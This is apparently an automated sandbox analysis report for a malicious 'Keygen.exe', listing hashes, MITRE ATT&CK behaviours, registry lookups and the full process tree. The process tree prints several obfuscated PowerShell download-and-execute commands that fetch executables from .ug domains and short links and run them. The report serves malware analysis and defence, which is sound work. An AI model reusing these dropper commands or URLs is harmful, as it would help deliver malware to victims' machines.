38bc13ef112b2f17d4d1a80243fac6a521b5d58228984aae0752d79487fa3b66

Resubmissions

17-01-2025 20:27

250117-y8gzsasjhw 10

17-01-2025 10:48

250117-mv59nsvlbr 10

14-12-2024 07:51

241214-jqcj1sxnhr 10

11-12-2024 15:39

241211-s3498stkar 10

Analysis

max time kernel
284s
max time network
291s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20250113-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
17-01-2025 20:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Keygen.exe
Size

849KB
MD5

dbde61502c5c0e17ebc6919f361c32b9
SHA1

189749cf0b66a9f560b68861f98c22cdbcafc566
SHA256

88cad5f9433e50af09ac9cad9db06e9003e85be739060b88b64186c05c0d636b
SHA512

d9b8537f05844ec2f2549e2049e967a8023bfe432e3a9cf25fc0f7ad720e57a5830be733e1812cc806c5b68cd9586a031e394f67fc7e3f7fe390625fd5dedfbb
SSDEEP

24576:uSdQdKdRdOdHdmHBnWs/nROBiGR4+hazer+Vufo/JxBYQ5:hH9DnR1Z+45Ufo/PBL

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
10	4380	powershell.exe
11	4540	powershell.exe
13	4356	powershell.exe

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-564748828-2201999071-3764224244-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-564748828-2201999071-3764224244-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-564748828-2201999071-3764224244-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-564748828-2201999071-3764224244-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-564748828-2201999071-3764224244-1000\Control Panel\International\Geo\Nation	Keygen.exe
Key value queried	\REGISTRY\USER\S-1-5-21-564748828-2201999071-3764224244-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-564748828-2201999071-3764224244-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-564748828-2201999071-3764224244-1000\Control Panel\International\Geo\Nation	mshta.exe

Executes dropped EXE 1 IoCs

pid	Process
984	Keygen.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
60	powershell.exe
216	powershell.exe
4540	powershell.exe
2124	powershell.exe
4380	powershell.exe
4356	powershell.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\7b2f7134-1fdc-47bc-bc08-e7a2ac0357f9.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20250117203317.pma	setup.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 17 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Keygen.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Keygen.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
4636	timeout.exe
2304	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-564748828-2201999071-3764224244-1000_Classes\Local Settings	cmd.exe

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
216	powershell.exe
4540	powershell.exe
2124	powershell.exe
2124	powershell.exe
4380	powershell.exe
4380	powershell.exe
216	powershell.exe
216	powershell.exe
4540	powershell.exe
4540	powershell.exe
4380	powershell.exe
2124	powershell.exe
4356	powershell.exe
4356	powershell.exe
60	powershell.exe
60	powershell.exe
4356	powershell.exe
60	powershell.exe
1512	mspaint.exe
1512	mspaint.exe
4624	msedge.exe
4624	msedge.exe
3336	msedge.exe
3336	msedge.exe
3000	identity_helper.exe
3000	identity_helper.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs

pid	Process
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	216	powershell.exe
Token: SeDebugPrivilege	4540	powershell.exe
Token: SeDebugPrivilege	4380	powershell.exe
Token: SeDebugPrivilege	2124	powershell.exe
Token: SeDebugPrivilege	4356	powershell.exe
Token: SeDebugPrivilege	60	powershell.exe

Suspicious use of FindShellTrayWindow 32 IoCs

pid	Process
984	Keygen.exe
984	Keygen.exe
984	Keygen.exe
984	Keygen.exe
984	Keygen.exe
984	Keygen.exe
984	Keygen.exe
984	Keygen.exe
984	Keygen.exe
984	Keygen.exe
984	Keygen.exe
984	Keygen.exe
984	Keygen.exe
984	Keygen.exe
984	Keygen.exe
984	Keygen.exe
984	Keygen.exe
984	Keygen.exe
984	Keygen.exe
984	Keygen.exe
984	Keygen.exe
984	Keygen.exe
984	Keygen.exe
984	Keygen.exe
984	Keygen.exe
984	Keygen.exe
984	Keygen.exe
984	Keygen.exe
984	Keygen.exe
984	Keygen.exe
3336	msedge.exe
3336	msedge.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
984	Keygen.exe
1512	mspaint.exe
1512	mspaint.exe
1512	mspaint.exe
1512	mspaint.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2060 wrote to memory of 2528	2060	Keygen.exe	81
PID 2060 wrote to memory of 2528	2060	Keygen.exe	81
PID 2060 wrote to memory of 2528	2060	Keygen.exe	81
PID 2528 wrote to memory of 984	2528	cmd.exe	84
PID 2528 wrote to memory of 984	2528	cmd.exe	84
PID 2528 wrote to memory of 984	2528	cmd.exe	84
PID 2528 wrote to memory of 4696	2528	cmd.exe	85
PID 2528 wrote to memory of 4696	2528	cmd.exe	85
PID 2528 wrote to memory of 4696	2528	cmd.exe	85
PID 2528 wrote to memory of 2852	2528	cmd.exe	86
PID 2528 wrote to memory of 2852	2528	cmd.exe	86
PID 2528 wrote to memory of 2852	2528	cmd.exe	86
PID 2528 wrote to memory of 4636	2528	cmd.exe	87
PID 2528 wrote to memory of 4636	2528	cmd.exe	87
PID 2528 wrote to memory of 4636	2528	cmd.exe	87
PID 2852 wrote to memory of 216	2852	mshta.exe	88
PID 2852 wrote to memory of 216	2852	mshta.exe	88
PID 2852 wrote to memory of 216	2852	mshta.exe	88
PID 4696 wrote to memory of 4540	4696	mshta.exe	89
PID 4696 wrote to memory of 4540	4696	mshta.exe	89
PID 4696 wrote to memory of 4540	4696	mshta.exe	89
PID 2528 wrote to memory of 4780	2528	cmd.exe	92
PID 2528 wrote to memory of 4780	2528	cmd.exe	92
PID 2528 wrote to memory of 4780	2528	cmd.exe	92
PID 2528 wrote to memory of 2340	2528	cmd.exe	93
PID 2528 wrote to memory of 2340	2528	cmd.exe	93
PID 2528 wrote to memory of 2340	2528	cmd.exe	93
PID 2528 wrote to memory of 2304	2528	cmd.exe	94
PID 2528 wrote to memory of 2304	2528	cmd.exe	94
PID 2528 wrote to memory of 2304	2528	cmd.exe	94
PID 4780 wrote to memory of 4380	4780	mshta.exe	95
PID 4780 wrote to memory of 4380	4780	mshta.exe	95
PID 4780 wrote to memory of 4380	4780	mshta.exe	95
PID 2340 wrote to memory of 2124	2340	mshta.exe	96
PID 2340 wrote to memory of 2124	2340	mshta.exe	96
PID 2340 wrote to memory of 2124	2340	mshta.exe	96
PID 2528 wrote to memory of 3948	2528	cmd.exe	99
PID 2528 wrote to memory of 3948	2528	cmd.exe	99
PID 2528 wrote to memory of 3948	2528	cmd.exe	99
PID 2528 wrote to memory of 1784	2528	cmd.exe	100
PID 2528 wrote to memory of 1784	2528	cmd.exe	100
PID 2528 wrote to memory of 1784	2528	cmd.exe	100
PID 3948 wrote to memory of 4356	3948	mshta.exe	101
PID 3948 wrote to memory of 4356	3948	mshta.exe	101
PID 3948 wrote to memory of 4356	3948	mshta.exe	101
PID 1784 wrote to memory of 60	1784	mshta.exe	103
PID 1784 wrote to memory of 60	1784	mshta.exe	103
PID 1784 wrote to memory of 60	1784	mshta.exe	103
PID 3336 wrote to memory of 3396	3336	msedge.exe	120
PID 3336 wrote to memory of 3396	3336	msedge.exe	120
PID 3336 wrote to memory of 2352	3336	msedge.exe	121
PID 3336 wrote to memory of 2352	3336	msedge.exe	121
PID 3336 wrote to memory of 2352	3336	msedge.exe	121
PID 3336 wrote to memory of 2352	3336	msedge.exe	121
PID 3336 wrote to memory of 2352	3336	msedge.exe	121
PID 3336 wrote to memory of 2352	3336	msedge.exe	121
PID 3336 wrote to memory of 2352	3336	msedge.exe	121
PID 3336 wrote to memory of 2352	3336	msedge.exe	121
PID 3336 wrote to memory of 2352	3336	msedge.exe	121
PID 3336 wrote to memory of 2352	3336	msedge.exe	121
PID 3336 wrote to memory of 2352	3336	msedge.exe	121
PID 3336 wrote to memory of 2352	3336	msedge.exe	121
PID 3336 wrote to memory of 2352	3336	msedge.exe	121
PID 3336 wrote to memory of 2352	3336	msedge.exe	121

C:\Users\Admin\AppData\Local\Temp\Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Keygen.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2060
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6ADF.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\Keygen.exe"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:2528
- - C:\Users\Admin\AppData\Local\Temp\6ADF.tmp\Keygen.exe
    Keygen.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    PID:984
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\6ADF.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4696
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4540
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\6ADF.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2852
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:216
- - C:\Windows\SysWOW64\timeout.exe
    timeout 1
    3⤵
    - System Location Discovery: System Language Discovery
    - Delays execution with timeout.exe
    PID:4636
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\6ADF.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4780
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4380
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\6ADF.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2340
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2124
- - C:\Windows\SysWOW64\timeout.exe
    timeout 2
    3⤵
    - System Location Discovery: System Language Discovery
    - Delays execution with timeout.exe
    PID:2304
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\6ADF.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3948
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4356
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\6ADF.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1784
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:60

C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Desktop\RestoreSwitch.png"
1⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1512

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
1⤵
PID:3764

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1716

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\RevokeRemove.mhtml
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3336
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x140,0x144,0x148,0x11c,0x14c,0x7ff933b946f8,0x7ff933b94708,0x7ff933b94718
  2⤵
